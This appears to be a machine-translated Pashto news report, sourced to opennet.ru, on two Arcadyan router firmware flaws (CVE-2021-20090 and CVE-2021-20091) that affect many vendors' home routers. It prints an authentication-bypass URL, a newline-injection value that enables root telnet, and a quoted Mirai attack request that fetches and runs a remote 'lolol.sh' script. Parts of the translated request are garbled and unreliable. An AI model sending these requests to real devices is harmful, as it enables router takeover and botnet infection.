په کور روټرونو کې زیان منونکي 17 جوړونکي اغیزه کوي

د کور روټرونو پروړاندې په شبکه کې یو لوی برید ثبت شوی چې فرم ویئر د آرکیډیان شرکت څخه د HTTP سرور پلي کول کاروي. د وسیلو کنټرول ترلاسه کولو لپاره ، د دوه زیانونو ترکیب کارول کیږي چې د ریښې حقونو سره د خپل سري کوډ لرې پلي کولو ته اجازه ورکوي. ستونزه د Arcadyan، ASUS او Buffalo څخه د ADSL روټرونو پراخه لړۍ اغیزه کوي، په بیله بیا د بیلین برانډونو لاندې چمتو شوي وسایل (ستونزه په سمارټ باکس فلش کې تایید شوې)، Deutsche Telekom، Orange، O2، Telus، Verizon، Vodafone او نور مخابراتي چلونکي. د یادونې وړ ده چې ستونزه له 10 کلونو څخه ډیر وخت لپاره د آرکیډیان فرم ویئر کې شتون لري او پدې وخت کې د 20 مختلف تولید کونکو څخه لږترلږه 17 وسیلو ماډلونو ته لیږدولو توانیدلی.

لومړی زیانمننه، CVE-2021-20090، دا ممکنه کوي چې پرته له تصدیق پرته هر ډول ویب انٹرفیس سکریپټ ته لاسرسی ومومي. د زیان مننې جوهر دا دی چې په ویب انٹرفیس کې ځینې لارښودونه چې له لارې یې عکسونه، CSS فایلونه او جاواسکریپټ سکریپټونه لیږل کیږي پرته له تصدیق څخه د لاسرسي وړ دي. پدې حالت کې ، لارښودونه چې د تصدیق پرته لاسرسي ته اجازه لري د لومړني ماسک په کارولو سره چیک کیږي. اصلي لارښود ته د تګ لپاره په لارو کې د "../" حروفونو مشخص کول د فرم ویئر لخوا بند شوي ، مګر د "..٪ 2f" ترکیب کارول پریښودل شوي. په دې توګه، دا ممکنه ده چې خوندي پاڼې خلاصې کړئ کله چې غوښتنې لیږل کیږي لکه "http://192.168.1.1/images/..%2findex.htm".

دوهم زیان، CVE-2021-20091، یو مستند کارونکي ته اجازه ورکوي چې د app_abstract.cgi سکریپټ ته د ځانګړي فارمیټ شوي پیرامیټونو په لیږلو سره د وسیلې سیسټم ترتیباتو کې بدلون راولي، کوم چې په پیرامیټونو کې د نوي کریکټ شتون نه ګوري. . د مثال په توګه، کله چې د پینګ عملیات ترسره کوي، برید کوونکی کولی شي په ساحه کې د "192.168.1.2%0AARC_SYS_TelnetdEnable=1" ارزښت مشخص کړي چې د IP پتې چک کیږي، او سکریپټ، کله چې د ترتیباتو فایل رامینځته کوي /tmp/etc/config/ .glbcfg به په دې کې "AARC_SYS_TelnetdEnable=1" کرښه ولیکي، کوم چې د telnetd سرور فعالوي، کوم چې د روټ حقونو سره غیر محدود کمانډ شیل لاسرسی چمتو کوي. په ورته ډول، د AARC_SYS پیرامیټر په ترتیب کولو سره، تاسو کولی شئ په سیسټم کې کوم کوډ اجرا کړئ. لومړی زیانمنتیا دا ممکنه کوي چې د "/images/..%2fapply_abstract.cgi" په توګه د لاسرسي له لارې له تصدیق پرته ستونزه لرونکی سکریپټ پرمخ بوځي.

د زیانونو څخه د ګټې اخیستنې لپاره، برید کونکی باید وکوالی شي د شبکې پورټ ته غوښتنه واستوي چې ویب انٹرفیس په کې روان وي. د برید د خپریدو متحرکاتو په پام کې نیولو سره ، ډیری آپریټران د ملاتړ خدماتو لخوا د ستونزو تشخیص ساده کولو لپاره د بهرني شبکې څخه خپلو وسیلو ته لاسرسی پریږدي. که انٹرفیس ته لاسرسی یوازې د داخلي شبکې پورې محدود وي، برید د "DNS بیا جوړونې" تخنیک په کارولو سره د بهرنۍ شبکې څخه ترسره کیدی شي. زیان منونکي لا دمخه په فعاله توګه د میرای بوټنیټ سره د راوټرونو د نښلولو لپاره کارول کیږي: POST /images/..%2fapply_abstract.cgi HTTP/1.1 اتصال: د کارونکي اجنټ بند کړئ: تیاره عمل=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_address212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

سرچینه: opennet.ru

Add a comment